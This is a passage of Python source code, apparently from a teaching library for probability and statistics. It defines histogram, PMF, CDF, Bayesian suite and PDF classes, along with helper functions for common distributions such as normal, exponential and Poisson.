new.Set(val * factor, prob)
return new
def Log(self, m=None):
"""Log transforms the probabilities.
Removes values with probability 0.
Normalizes so that the largest logprob is 0.
"""
if self.log:
raise ValueError("Pmf/Hist already under a log transform")
self.log = True
if m is None:
m = self.MaxLike()
for x, p in self.d.items():
if p:
self.Set(x, math.log(p / m))
else:
self.Remove(x)
def Exp(self, m=None):
"""Exponentiates the probabilities.
m: how much to shift the ps before exponentiating
If m is None, normalizes so that the largest prob is 1.
"""
if not self.log:
raise ValueError("Pmf/Hist not under a log transform")
self.log = False
if m is None:
m = self.MaxLike()
for x, p in self.d.items():
self.Set(x, math.exp(p - m))
def GetDict(self):
"""Gets the dictionary."""
return self.d
def SetDict(self, d):
"""Sets the dictionary."""
self.d = d
def Values(self):
"""Gets an unsorted sequence of values.
Note: one source of confusion is that the keys of this
dictionary are the values of the Hist/Pmf, and the
values of the dictionary are frequencies/probabilities.
"""
return self.d.keys()
def Items(self):
"""Gets an unsorted sequence of (value, freq/prob) pairs."""
return self.d.items()
def Render(self, **options):
"""Generates a sequence of points suitable for plotting.
Note: options are ignored
Returns:
tuple of (sorted value sequence, freq/prob sequence)
"""
if min(self.d.keys()) is np.nan:
logging.warning('Hist: contains NaN, may not render correctly.')
return zip(*sorted(self.Items()))
def MakeCdf(self, label=None):
"""Makes a Cdf."""
label = label if label is not None else self.label
return Cdf(self, label=label)
def Print(self):
"""Prints the values and freqs/probs in ascending order."""
for val, prob in sorted(self.d.items()):
print(val, prob)
def Set(self, x, y=0):
"""Sets the freq/prob associated with the value x.
Args:
x: number value
y: number freq or prob
"""
self.d[x] = y
def Incr(self, x, term=1):
"""Increments the freq/prob associated with the value x.
Args:
x: number value
term: how much to increment by
"""
self.d[x] = self.d.get(x, 0) + term
def Mult(self, x, factor):
"""Scales the freq/prob associated with the value x.
Args:
x: number value
factor: how much to multiply by
"""
self.d[x] = self.d.get(x, 0) * factor
def Remove(self, x):
"""Removes a value.
Throws an exception if the value is not there.
Args:
x: value to remove
"""
del self.d[x]
def Total(self):
"""Returns the total of the frequencies/probabilities in the map."""
total = sum(self.d.values())
return total
def MaxLike(self):
"""Returns the largest frequency/probability in the map."""
return max(self.d.values())
def Largest(self, n=10):
"""Returns the largest n values, with frequency/probability.
n: number of items to return
"""
return sorted(self.d.items(), reverse=True)[:n]
def Smallest(self, n=10):
"""Returns the smallest n values, with frequency/probability.
n: number of items to return
"""
return sorted(self.d.items(), reverse=False)[:n]
class Hist(_DictWrapper):
"""Represents a histogram, which is a map from values to frequencies.
Values can be any hashable type; frequencies are integer counters.
"""
def Freq(self, x):
"""Gets the frequency associated with the value x.
Args:
x: number value
Returns:
int frequency
"""
return self.d.get(x, 0)
def Freqs(self, xs):
"""Gets frequencies for a sequence of values."""
return [self.Freq(x) for x in xs]
def IsSubset(self, other):
"""Checks whether the values in this histogram are a subset of
the values in the given histogram."""
for val, freq in self.Items():
if freq > other.Freq(val):
return False
return True
def Subtract(self, other):
"""Subtracts the values in the given histogram from this histogram."""
for val, freq in other.Items():
self.Incr(val, -freq)
class Pmf(_DictWrapper):
"""Represents a probability mass function.
Values can be any hashable type; probabilities are floating-point.
Pmfs are not necessarily normalized.
"""
def Prob(self, x, default=0):
"""Gets the probability associated with the value x.
Args:
x: number value
default: value to return if the key is not there
Returns:
float probability
"""
return self.d.get(x, default)
def Probs(self, xs):
"""Gets probabilities for a sequence of values."""
return [self.Prob(x) for x in xs]
def Percentile(self, percentage):
"""Computes a percentile of a given Pmf.
Note: this is not super efficient. If you are planning
to compute more than a few percentiles, compute the Cdf.
percentage: float 0-100
returns: value from the Pmf
"""
p = percentage / 100.0
total = 0
for val, prob in sorted(self.Items()):
total += prob
if total >= p:
return val
def ProbGreater(self, x):
"""Probability that a sample from this Pmf exceeds x.
x: number
returns: float probability
"""
if isinstance(x, _DictWrapper):
return PmfProbGreater(self, x)
else:
t = [prob for (val, prob) in self.d.items() if val > x]
return sum(t)
def ProbLess(self, x):
"""Probability that a sample from this Pmf is less than x.
x: number
returns: float probability
"""
if isinstance(x, _DictWrapper):
return PmfProbLess(self, x)
else:
t = [prob for (val, prob) in self.d.items() if val < x]
return sum(t)
def __lt__(self, obj):
"""Less than.
obj: number or _DictWrapper
returns: float probability
"""
return self.ProbLess(obj)
def __gt__(self, obj):
"""Greater than.
obj: number or _DictWrapper
returns: float probability
"""
return self.ProbGreater(obj)
def __ge__(self, obj):
"""Greater than or equal.
obj: number or _DictWrapper
returns: float probability
"""
return 1 - (self < obj)
def __le__(self, obj):
"""Less than or equal.
obj: number or _DictWrapper
returns: float probability
"""
return 1 - (self > obj)
def Normalize(self, fraction=1.0):
"""Normalizes this PMF so the sum of all probs is fraction.
Args:
fraction: what the total should be after normalization
Returns: the total probability before normalizing
"""
if self.log:
raise ValueError("Normalize: Pmf is under a log transform")
total = self.Total()
if total == 0.0:
raise ValueError('Normalize: total probability is zero.')
#logging.warning('Normalize: total probability is zero.')
#return total
factor = fraction / total
for x in self.d:
self.d[x] *= factor
return total
def Random(self):
"""Chooses a random element from this PMF.
Note: this is not very efficient. If you plan to call
this more than a few times, consider converting to a CDF.
Returns:
float value from the Pmf
"""
target = random.random()
total = 0.0
for x, p in self.d.items():
total += p
if total >= target:
return x
# we shouldn't get here
raise ValueError('Random: Pmf might not be normalized.')
def Mean(self):
"""Computes the mean of a PMF.
Returns:
float mean
"""
mean = 0.0
for x, p in self.d.items():
mean += p * x
return mean
def Var(self, mu=None):
"""Computes the variance of a PMF.
mu: the point around which the variance is computed;
if omitted, computes the mean
returns: float variance
"""
if mu is None:
mu = self.Mean()
var = 0.0
for x, p in self.d.items():
var += p * (x - mu) ** 2
return var
def Std(self, mu=None):
"""Computes the standard deviation of a PMF.
mu: the point around which the variance is computed;
if omitted, computes the mean
returns: float standard deviation
"""
var = self.Var(mu)
return math.sqrt(var)
def MaximumLikelihood(self):
"""Returns the value with the highest probability.
Returns: float probability
"""
_, val = max((prob, val) for val, prob in self.Items())
return val
def CredibleInterval(self, percentage=90):
"""Computes the central credible interval.
If percentage=90, computes the 90% CI.
Args:
percentage: float between 0 and 100
Returns:
sequence of two floats, low and high
"""
cdf = self.MakeCdf()
return cdf.CredibleInterval(percentage)
def __add__(self, other):
"""Computes the Pmf of the sum of values drawn from self and other.
other: another Pmf or a scalar
returns: new Pmf
"""
try:
return self.AddPmf(other)
except AttributeError:
return self.AddConstant(other)
def AddPmf(self, other):
"""Computes the Pmf of the sum of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
for v2, p2 in other.Items():
pmf.Incr(v1 + v2, p1 * p2)
return pmf
def AddConstant(self, other):
"""Computes the Pmf of the sum a constant and values from self.
other: a number
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
pmf.Set(v1 + other, p1)
return pmf
def __sub__(self, other):
"""Computes the Pmf of the diff of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
try:
return self.SubPmf(other)
except AttributeError:
return self.AddConstant(-other)
def SubPmf(self, other):
"""Computes the Pmf of the diff of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
for v2, p2 in other.Items():
pmf.Incr(v1 - v2, p1 * p2)
return pmf
def __mul__(self, other):
"""Computes the Pmf of the product of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
try:
return self.MulPmf(other)
except AttributeError:
return self.MulConstant(other)
def MulPmf(self, other):
"""Computes the Pmf of the diff of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
for v2, p2 in other.Items():
pmf.Incr(v1 * v2, p1 * p2)
return pmf
def MulConstant(self, other):
"""Computes the Pmf of the product of a constant and values from self.
other: a number
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
pmf.Set(v1 * other, p1)
return pmf
def __div__(self, other):
"""Computes the Pmf of the ratio of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
try:
return self.DivPmf(other)
except AttributeError:
return self.MulConstant(1/other)
__truediv__ = __div__
def DivPmf(self, other):
"""Computes the Pmf of the ratio of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
for v2, p2 in other.Items():
pmf.Incr(v1 / v2, p1 * p2)
return pmf
def Max(self, k):
"""Computes the CDF of the maximum of k selections from this dist.
k: int
returns: new Cdf
"""
cdf = self.MakeCdf()
return cdf.Max(k)
class Joint(Pmf):
"""Represents a joint distribution.
The values are sequences (usually tuples)
"""
def Marginal(self, i, label=None):
"""Gets the marginal distribution of the indicated variable.
i: index of the variable we want
Returns: Pmf
"""
pmf = Pmf(label=label)
for vs, prob in self.Items():
pmf.Incr(vs[i], prob)
return pmf
def Conditional(self, i, j, val, label=None):
"""Gets the conditional distribution of the indicated variable.
Distribution of vs[i], conditioned on vs[j] = val.
i: index of the variable we want
j: which variable is conditioned on
val: the value the jth variable has to have
Returns: Pmf
"""
pmf = Pmf(label=label)
for vs, prob in self.Items():
if vs[j] != val:
continue
pmf.Incr(vs[i], prob)
pmf.Normalize()
return pmf
def MaxLikeInterval(self, percentage=90):
"""Returns the maximum-likelihood credible interval.
If percentage=90, computes a 90% CI containing the values
with the highest likelihoods.
percentage: float between 0 and 100
Returns: list of values from the suite
"""
interval = []
total = 0
t = [(prob, val) for val, prob in self.Items()]
t.sort(reverse=True)
for prob, val in t:
interval.append(val)
total += prob
if total >= percentage / 100.0:
break
return interval
def MakeJoint(pmf1, pmf2):
"""Joint distribution of values from pmf1 and pmf2.
Assumes that the PMFs represent independent random variables.
Args:
pmf1: Pmf object
pmf2: Pmf object
Returns:
Joint pmf of value pairs
"""
joint = Joint()
for v1, p1 in pmf1.Items():
for v2, p2 in pmf2.Items():
joint.Set((v1, v2), p1 * p2)
return joint
def MakeHistFromList(t, label=None):
"""Makes a histogram from an unsorted sequence of values.
Args:
t: sequence of numbers
label: string label for this histogram
Returns:
Hist object
"""
return Hist(t, label=label)
def MakeHistFromDict(d, label=None):
"""Makes a histogram from a map from values to frequencies.
Args:
d: dictionary that maps values to frequencies
label: string label for this histogram
Returns:
Hist object
"""
return Hist(d, label)
def MakePmfFromList(t, label=None):
"""Makes a PMF from an unsorted sequence of values.
Args:
t: sequence of numbers
label: string label for this PMF
Returns:
Pmf object
"""
return Pmf(t, label=label)
def MakePmfFromDict(d, label=None):
"""Makes a PMF from a map from values to probabilities.
Args:
d: dictionary that maps values to probabilities
label: string label for this PMF
Returns:
Pmf object
"""
return Pmf(d, label=label)
def MakePmfFromItems(t, label=None):
"""Makes a PMF from a sequence of value-probability pairs
Args:
t: sequence of value-probability pairs
label: string label for this PMF
Returns:
Pmf object
"""
return Pmf(dict(t), label=label)
def MakePmfFromHist(hist, label=None):
"""Makes a normalized PMF from a Hist object.
Args:
hist: Hist object
label: string label
Returns:
Pmf object
"""
if label is None:
label = hist.label
return Pmf(hist, label=label)
def MakeMixture(metapmf, label='mix'):
"""Make a mixture distribution.
Args:
metapmf: Pmf that maps from Pmfs to probs.
label: string label for the new Pmf.
Returns: Pmf object.
"""
mix = Pmf(label=label)
for pmf, p1 in metapmf.Items():
for x, p2 in pmf.Items():
mix.Incr(x, p1 * p2)
return mix
def MakeUniformPmf(low, high, n):
"""Make a uniform Pmf.
low: lowest value (inclusive)
high: highest value (inclusize)
n: number of values
"""
pmf = Pmf()
for x in np.linspace(low, high, n):
pmf.Set(x, 1)
pmf.Normalize()
return pmf
class Cdf(object):
"""Represents a cumulative distribution function.
Attributes:
xs: sequence of values
ps: sequence of probabilities
label: string used as a graph label.
"""
def __init__(self, obj=None, ps=None, label=None):
"""Initializes.
If ps is provided, obj must be the corresponding list of values.
obj: Hist, Pmf, Cdf, Pdf, dict, pandas Series, list of pairs
ps: list of cumulative probabilities
label: string label
"""
self.label = label if label is not None else '_nolegend_'
if isinstance(obj, (_DictWrapper, Cdf, Pdf)):
if not label:
self.label = label if label is not None else obj.label
if obj is None:
# caller does not provide obj, make an empty Cdf
self.xs = np.asarray([])
self.ps = np.asarray([])
if ps is not None:
logging.warning("Cdf: can't pass ps without also passing xs.")
return
else:
# if the caller provides xs and ps, just store them
if ps is not None:
if isinstance(ps, str):
logging.warning("Cdf: ps can't be a string")
self.xs = np.asarray(obj)
self.ps = np.asarray(ps)
return
# caller has provided just obj, not ps
if isinstance(obj, Cdf):
self.xs = copy.copy(obj.xs)
self.ps = copy.copy(obj.ps)
return
if isinstance(obj, _DictWrapper):
dw = obj
else:
dw = Hist(obj)
if len(dw) == 0:
self.xs = np.asarray([])
self.ps = np.asarray([])
return
xs, freqs = zip(*sorted(dw.Items()))
self.xs = np.asarray(xs)
self.ps = np.cumsum(freqs, dtype=np.float)
self.ps /= self.ps[-1]
def __str__(self):
return 'Cdf(%s, %s)' % (str(self.xs), str(self.ps))
__repr__ = __str__
def __len__(self):
return len(self.xs)
def __getitem__(self, x):
return self.Prob(x)
def __setitem__(self):
raise UnimplementedMethodException()
def __delitem__(self):
raise UnimplementedMethodException()
def __eq__(self, other):
return np.all(self.xs == other.xs) and np.all(self.ps == other.ps)
def Copy(self, label=None):
"""Returns a copy of this Cdf.
label: string label for the new Cdf
"""
if label is None:
label = self.label
return Cdf(list(self.xs), list(self.ps), label=label)
def MakePmf(self, label=None):
"""Makes a Pmf."""
if label is None:
label = self.label
return Pmf(self, label=label)
def Values(self):
"""Returns a sorted list of values.
"""
return self.xs
def Items(self):
"""Returns a sorted sequence of (value, probability) pairs.
Note: in Python3, returns an iterator.
"""
a = self.ps
b = np.roll(a, 1)
b[0] = 0
return zip(self.xs, a-b)
def Shift(self, term):
"""Adds a term to the xs.
term: how much to add
"""
new = self.Copy()
# don't use +=, or else an int array + float yields int array
new.xs = new.xs + term
return new
def Scale(self, factor):
"""Multiplies the xs by a factor.
factor: what to multiply by
"""
new = self.Copy()
# don't use *=, or else an int array * float yields int array
new.xs = new.xs * factor
return new
def Prob(self, x):
"""Returns CDF(x), the probability that corresponds to value x.
Args:
x: number
Returns:
float probability
"""
if x < self.xs[0]:
return 0.0
index = bisect.bisect(self.xs, x)
p = self.ps[index-1]
return p
def Probs(self, xs):
"""Gets probabilities for a sequence of values.
xs: any sequence that can be converted to NumPy array
returns: NumPy array of cumulative probabilities
"""
xs = np.asarray(xs)
index = np.searchsorted(self.xs, xs, side='right')
ps = self.ps[index-1]
ps[xs < self.xs[0]] = 0.0
return ps
ProbArray = Probs
def Value(self, p):
"""Returns InverseCDF(p), the value that corresponds to probability p.
Args:
p: number in the range [0, 1]
Returns:
number value
"""
if p < 0 or p > 1:
raise ValueError('Probability p must be in range [0, 1]')
index = bisect.bisect_left(self.ps, p)
return self.xs[index]
def ValueArray(self, ps):
"""Returns InverseCDF(p), the value that corresponds to probability p.
Args:
ps: NumPy array of numbers in the range [0, 1]
Returns:
NumPy array of values
"""
ps = np.asarray(ps)
if np.any(ps < 0) or np.any(ps > 1):
raise ValueError('Probability p must be in range [0, 1]')
index = np.searchsorted(self.ps, ps, side='left')
return self.xs[index]
def Percentile(self, p):
"""Returns the value that corresponds to percentile p.
Args:
p: number in the range [0, 100]
Returns:
number value
"""
return self.Value(p / 100.0)
def PercentileRank(self, x):
"""Returns the percentile rank of the value x.
x: potential value in the CDF
returns: percentile rank in the range 0 to 100
"""
return self.Prob(x) * 100.0
def Random(self):
"""Chooses a random value from this distribution."""
return self.Value(random.random())
def Sample(self, n):
"""Generates a random sample from this distribution.
n: int length of the sample
returns: NumPy array
"""
ps = np.random.random(n)
return self.ValueArray(ps)
def Mean(self):
"""Computes the mean of a CDF.
Returns:
float mean
"""
old_p = 0
total = 0.0
for x, new_p in zip(self.xs, self.ps):
p = new_p - old_p
total += p * x
old_p = new_p
return total
def CredibleInterval(self, percentage=90):
"""Computes the central credible interval.
If percentage=90, computes the 90% CI.
Args:
percentage: float between 0 and 100
Returns:
sequence of two floats, low and high
"""
prob = (1 - percentage / 100.0) / 2
interval = self.Value(prob), self.Value(1 - prob)
return interval
ConfidenceInterval = CredibleInterval
def _Round(self, multiplier=1000.0):
"""
An entry is added to the cdf only if the percentile differs
from the previous value in a significant digit, where the number
of significant digits is determined by multiplier. The
default is 1000, which keeps log10(1000) = 3 significant digits.
"""
# TODO(write this method)
raise UnimplementedMethodException()
def Render(self, **options):
"""Generates a sequence of points suitable for plotting.
An empirical CDF is a step function; linear interpolation
can be misleading.
Note: options are ignored
Returns:
tuple of (xs, ps)
"""
def interleave(a, b):
c = np.empty(a.shape[0] + b.shape[0])
c[::2] = a
c[1::2] = b
return c
a = np.array(self.xs)
xs = interleave(a, a)
shift_ps = np.roll(self.ps, 1)
shift_ps[0] = 0
ps = interleave(shift_ps, self.ps)
return xs, ps
def Max(self, k):
"""Computes the CDF of the maximum of k selections from this dist.
k: int
returns: new Cdf
"""
cdf = self.Copy()
cdf.ps **= k
return cdf
def MakeCdfFromItems(items, label=None):
"""Makes a cdf from an unsorted sequence of (value, frequency) pairs.
Args:
items: unsorted sequence of (value, frequency) pairs
label: string label for this CDF
Returns:
cdf: list of (value, fraction) pairs
"""
return Cdf(dict(items), label=label)
def MakeCdfFromDict(d, label=None):
"""Makes a CDF from a dictionary that maps values to frequencies.
Args:
d: dictionary that maps values to frequencies.
label: string label for the data.
Returns:
Cdf object
"""
return Cdf(d, label=label)
def MakeCdfFromList(seq, label=None):
"""Creates a CDF from an unsorted sequence.
Args:
seq: unsorted sequence of sortable values
label: string label for the cdf
Returns:
Cdf object
"""
return Cdf(seq, label=label)
def MakeCdfFromHist(hist, label=None):
"""Makes a CDF from a Hist object.
Args:
hist: Pmf.Hist object
label: string label for the data.
Returns:
Cdf object
"""
if label is None:
label = hist.label
return Cdf(hist, label=label)
def MakeCdfFromPmf(pmf, label=None):
"""Makes a CDF from a Pmf object.
Args:
pmf: Pmf.Pmf object
label: string label for the data.
Returns:
Cdf object
"""
if label is None:
label = pmf.label
return Cdf(pmf, label=label)
class UnimplementedMethodException(Exception):
"""Exception if someone calls a method that should be overridden."""
class Suite(Pmf):
"""Represents a suite of hypotheses and their probabilities."""
def Update(self, data):
"""Updates each hypothesis based on the data.
data: any representation of the data
returns: the normalizing constant
"""
for hypo in self.Values():
like = self.Likelihood(data, hypo)
self.Mult(hypo, like)
return self.Normalize()
def LogUpdate(self, data):
"""Updates a suite of hypotheses based on new data.
Modifies the suite directly; if you want to keep the original, make
a copy.
Note: unlike Update, LogUpdate does not normalize.
Args:
data: any representation of the data
"""
for hypo in self.Values():
like = self.LogLikelihood(data, hypo)
self.Incr(hypo, like)
def UpdateSet(self, dataset):
"""Updates each hypothesis based on the dataset.
This is more efficient than calling Update repeatedly because
it waits until the end to Normalize.
Modifies the suite directly; if you want to keep the original, make
a copy.
dataset: a sequence of data
returns: the normalizing constant
"""
for data in dataset:
for hypo in self.Values():
like = self.Likelihood(data, hypo)
self.Mult(hypo, like)
return self.Normalize()
def LogUpdateSet(self, dataset):
"""Updates each hypothesis based on the dataset.
Modifies the suite directly; if you want to keep the original, make
a copy.
dataset: a sequence of data
returns: None
"""
for data in dataset:
self.LogUpdate(data)
def Likelihood(self, data, hypo):
"""Computes the likelihood of the data under the hypothesis.
hypo: some representation of the hypothesis
data: some representation of the data
"""
raise UnimplementedMethodException()
def LogLikelihood(self, data, hypo):
"""Computes the log likelihood of the data under the hypothesis.
hypo: some representation of the hypothesis
data: some representation of the data
"""
raise UnimplementedMethodException()
def Print(self):
"""Prints the hypotheses and their probabilities."""
for hypo, prob in sorted(self.Items()):
print(hypo, prob)
def MakeOdds(self):
"""Transforms from probabilities to odds.
Values with prob=0 are removed.
"""
for hypo, prob in self.Items():
if prob:
self.Set(hypo, Odds(prob))
else:
self.Remove(hypo)
def MakeProbs(self):
"""Transforms from odds to probabilities."""
for hypo, odds in self.Items():
self.Set(hypo, Probability(odds))
def MakeSuiteFromList(t, label=None):
"""Makes a suite from an unsorted sequence of values.
Args:
t: sequence of numbers
label: string label for this suite
Returns:
Suite object
"""
hist = MakeHistFromList(t, label=label)
d = hist.GetDict()
return MakeSuiteFromDict(d)
def MakeSuiteFromHist(hist, label=None):
"""Makes a normalized suite from a Hist object.
Args:
hist: Hist object
label: string label
Returns:
Suite object
"""
if label is None:
label = hist.label
# make a copy of the dictionary
d = dict(hist.GetDict())
return MakeSuiteFromDict(d, label)
def MakeSuiteFromDict(d, label=None):
"""Makes a suite from a map from values to probabilities.
Args:
d: dictionary that maps values to probabilities
label: string label for this suite
Returns:
Suite object
"""
suite = Suite(label=label)
suite.SetDict(d)
suite.Normalize()
return suite
class Pdf(object):
"""Represents a probability density function (PDF)."""
def Density(self, x):
"""Evaluates this Pdf at x.
Returns: float or NumPy array of probability density
"""
raise UnimplementedMethodException()
def GetLinspace(self):
"""Get a linspace for plotting.
Not all subclasses of Pdf implement this.
Returns: numpy array
"""
raise UnimplementedMethodException()
def MakePmf(self, **options):
"""Makes a discrete version of this Pdf.
options can include
label: string
low: low end of range
high: high end of range
n: number of places to evaluate
Returns: new Pmf
"""
label = options.pop('label', '')
xs, ds = self.Render(**options)
return Pmf(dict(zip(xs, ds)), label=label)
def Render(self, **options):
"""Generates a sequence of points suitable for plotting.
If options includes low and high, it must also include n;
in that case the density is evaluated an n locations between
low and high, including both.
If options includes xs, the density is evaluate at those location.
Otherwise, self.GetLinspace is invoked to provide the locations.
Returns:
tuple of (xs, densities)
"""
low, high = options.pop('low', None), options.pop('high', None)
if low is not None and high is not None:
n = options.pop('n', 101)
xs = np.linspace(low, high, n)
else:
xs = options.pop('xs', None)
if xs is None:
xs = self.GetLinspace()
ds = self.Density(xs)
return xs, ds
def Items(self):
"""Generates a sequence of (value, probability) pairs.
"""
return zip(*self.Render())
class NormalPdf(Pdf):
"""Represents the PDF of a Normal distribution."""
def __init__(self, mu=0, sigma=1, label=None):
"""Constructs a Normal Pdf with given mu and sigma.
mu: mean
sigma: standard deviation
label: string
"""
self.mu = mu
self.sigma = sigma
self.label = label if label is not None else '_nolegend_'
def __str__(self):
return 'NormalPdf(%f, %f)' % (self.mu, self.sigma)
def GetLinspace(self):
"""Get a linspace for plotting.
Returns: numpy array
"""
low, high = self.mu-3*self.sigma, self.mu+3*self.sigma
return np.linspace(low, high, 101)
def Density(self, xs):
"""Evaluates this Pdf at xs.
xs: scalar or sequence of floats
returns: float or NumPy array of probability density
"""
return stats.norm.pdf(xs, self.mu, self.sigma)
class ExponentialPdf(Pdf):
"""Represents the PDF of an exponential distribution."""
def __init__(self, lam=1, label=None):
"""Constructs an exponential Pdf with given parameter.
lam: rate parameter
label: string
"""
self.lam = lam
self.label = label if label is not None else '_nolegend_'
def __str__(self):
return 'ExponentialPdf(%f)' % (self.lam)
def GetLinspace(self):
"""Get a linspace for plotting.
Returns: numpy array
"""
low, high = 0, 5.0/self.lam
return np.linspace(low, high, 101)
def Density(self, xs):
"""Evaluates this Pdf at xs.
xs: scalar or sequence of floats
returns: float or NumPy array of probability density
"""
return stats.expon.pdf(xs, scale=1.0/self.lam)
class EstimatedPdf(Pdf):
"""Represents a PDF estimated by KDE."""
def __init__(self, sample, label=None):
"""Estimates the density function based on a sample.
sample: sequence of data
label: string
"""
self.label = label if label is not None else '_nolegend_'
self.kde = stats.gaussian_kde(sample)
low = min(sample)
high = max(sample)
self.linspace = np.linspace(low, high, 101)
def __str__(self):
return 'EstimatedPdf(label=%s)' % str(self.label)
def GetLinspace(self):
"""Get a linspace for plotting.
Returns: numpy array
"""
return self.linspace
def Density(self, xs):
"""Evaluates this Pdf at xs.
returns: float or NumPy array of probability density
"""
return self.kde.evaluate(xs)
def Sample(self, n):
"""Generates a random sample from the estimated Pdf.
n: size of sample
"""
# NOTE: we have to flatten because resample returns a 2-D
# array for some reason.
return self.kde.resample(n).flatten()
def CredibleInterval(pmf, percentage=90):
"""Computes a credible interval for a given distribution.
If percentage=90, computes the 90% CI.
Args:
pmf: Pmf object representing a posterior distribution
percentage: float between 0 and 100
Returns:
sequence of two floats, low and high
"""
cdf = pmf.MakeCdf()
prob = (1 - percentage / 100.0) / 2
interval = cdf.Value(prob), cdf.Value(1 - prob)
return interval
def PmfProbLess(pmf1, pmf2):
"""Probability that a value from pmf1 is less than a value from pmf2.
Args:
pmf1: Pmf object
pmf2: Pmf object
Returns:
float probability
"""
total = 0.0
for v1, p1 in pmf1.Items():
for v2, p2 in pmf2.Items():
if v1 < v2:
total += p1 * p2
return total
def PmfProbGreater(pmf1, pmf2):
"""Probability that a value from pmf1 is less than a value from pmf2.
Args:
pmf1: Pmf object
pmf2: Pmf object
Returns:
float probability
"""
total = 0.0
for v1, p1 in pmf1.Items():
for v2, p2 in pmf2.Items():
if v1 > v2:
total += p1 * p2
return total
def PmfProbEqual(pmf1, pmf2):
"""Probability that a value from pmf1 equals a value from pmf2.
Args:
pmf1: Pmf object
pmf2: Pmf object
Returns:
float probability
"""
total = 0.0
for v1, p1 in pmf1.Items():
for v2, p2 in pmf2.Items():
if v1 == v2:
total += p1 * p2
return total
def RandomSum(dists):
"""Chooses a random value from each dist and returns the sum.
dists: sequence of Pmf or Cdf objects
returns: numerical sum
"""
total = sum(dist.Random() for dist in dists)
return total
def SampleSum(dists, n):
"""Draws a sample of sums from a list of distributions.
dists: sequence of Pmf or Cdf objects
n: sample size
returns: new Pmf of sums
"""
pmf = Pmf(RandomSum(dists) for i in range(n))
return pmf
def EvalNormalPdf(x, mu, sigma):
"""Computes the unnormalized PDF of the normal distribution.
x: value
mu: mean
sigma: standard deviation
returns: float probability density
"""
return stats.norm.pdf(x, mu, sigma)
def MakeNormalPmf(mu, sigma, num_sigmas, n=201):
"""Makes a PMF discrete approx to a Normal distribution.
mu: float mean
sigma: float standard deviation
num_sigmas: how many sigmas to extend in each direction
n: number of values in the Pmf
returns: normalized Pmf
"""
pmf = Pmf()
low = mu - num_sigmas * sigma
high = mu + num_sigmas * sigma
for x in np.linspace(low, high, n):
p = EvalNormalPdf(x, mu, sigma)
pmf.Set(x, p)
pmf.Normalize()
return pmf
def EvalBinomialPmf(k, n, p):
"""Evaluates the binomial PMF.
Returns the probabily of k successes in n trials with probability p.
"""
return stats.binom.pmf(k, n, p)
def EvalHypergeomPmf(k, N, K, n):
"""Evaluates the hypergeometric PMF.
Returns the probabily of k successes in n trials from a population
N with K successes in it.
"""
return stats.hypergeom.pmf(k, N, K, n)
def EvalPoissonPmf(k, lam):
"""Computes the Poisson PMF.
k: number of events
lam: parameter lambda in events per unit time
returns: float probability
"""
# don't use the scipy function (yet). for lam=0 it returns NaN;
# should be 0.0
# return stats.poisson.pmf(k, lam)
return lam ** k * math.exp(-lam) / special.gamma(k+1)
def MakePoissonPmf(lam, high, step=1):
"""Makes a PMF discrete approx to a Poisson distribution.
lam: parameter lambda in events per unit time
high: upper bound of the Pmf
returns: normalized Pmf
"""
pmf = Pmf()
for k in range(0, high + 1, step):
p = EvalPoissonPmf(k, lam)
pmf.Set(k, p)
pmf.Normalize()
return pmf
def EvalExponentialPdf(x, lam):
"""Computes the exponential PDF.
x: value
lam: parameter lambda in events per unit time
returns: float probability density
"""
return lam * math.exp(-lam * x)
def EvalExponentialCdf(x, lam):
"""Evaluates CDF of the exponential distribution with parameter lam."""
return 1 - math.exp(-lam * x)
def MakeExponentialPmf(lam, high, n=200):
"""Makes a PMF discrete approx to an exponential distribution.
lam: parameter lambda in events per unit time
high: upper bound
n: number of values in the Pmf
returns: normalized Pmf
"""
pmf = Pmf()
for x in np.linspace(0, high, n):
p = EvalExponentialPdf(x, lam)
pmf.Set(x, p)
pmf.Normalize()
return pmf
def StandardNormalCdf(x):
"""Evaluates the CDF of the standard Normal distribution.
See http://en.wikipedia.org/wiki/Normal_distribution
#Cumulative_distribution_function
Args:
x: float
Returns:
float
"""
return (math.erf(x / ROOT2) + 1) / 2
def EvalNormalCdf(x, mu=0, sigma=1):
"""Evaluates the CDF of the normal distribution.
Args:
x: float
mu: mean parameter
sigma: standard deviation parameter
Returns:
float
"""
return stats.norm.cdf(x, loc=mu, scale=sigma)
def EvalNormalCdfInverse(p, mu=0, sigma=1):
"""Evaluates the inverse CDF of the normal distribution.
See http://en.wikipedia.org/wiki/Normal_distribution#Quantile_function
Args:
p: float
mu: mean parameter
sigma: standard deviation parameter
Returns:
float
"""
return stats.norm.ppf(p, loc=mu, scale=sigma)
def EvalLognormalCdf(x, mu=0, sigma=1):
"""Evaluates the CDF of the lognormal distribution.
x: float or sequence
mu: mean parameter
sigma: standard deviation parameter
Returns: float or sequence
"""
return stats.lognorm.cdf(x, loc=mu, scale=sigma)
def RenderExpoCdf(lam, low, high, n=101):
"""Generates sequences of xs and ps for an exponential CDF.
lam: parameter
low: float
high: float
n: number of points to render
returns: numpy arrays (xs, ps)
"""
xs = np.linspace(low, high, n)
ps = 1 - np.exp(-lam * xs)
#ps = stats.expon.cdf(xs, scale=1.0/lam)
return xs, ps
def RenderNormalCdf(mu, sigma, low, high, n=101):
"""Generates sequences of xs and ps for a Normal CDF.
mu: parameter
sigma: parameter
low: float
high: float
n: number of points to render
returns: numpy arrays (xs, ps)
"""
xs = np.linspace(low, high, n)
ps = stats.norm.cdf(xs, mu, sigma)
return xs, ps
def RenderParetoCdf(xmin, alpha, low, high, n=50):
"""Generates sequences of xs and ps for a Pareto CDF.
xmin: parameter
alpha: parameter
low: float
high: float
n: number of points to render
returns: numpy arrays (xs, ps)
"""
if low < xmin:
low = xmin
xs = np.linspace(low, high, n)
ps = 1 - (xs / xmin) ** -alpha
#ps = stats.pareto.cdf(xs, scale=xmin, b=alpha)
return xs, ps
class Beta(object):
"""Represents a Beta distribution.
See http://en.wikipedia.org/wiki/Beta_distribution
"""
def __init__(self, alpha=1, beta=1, label=None):
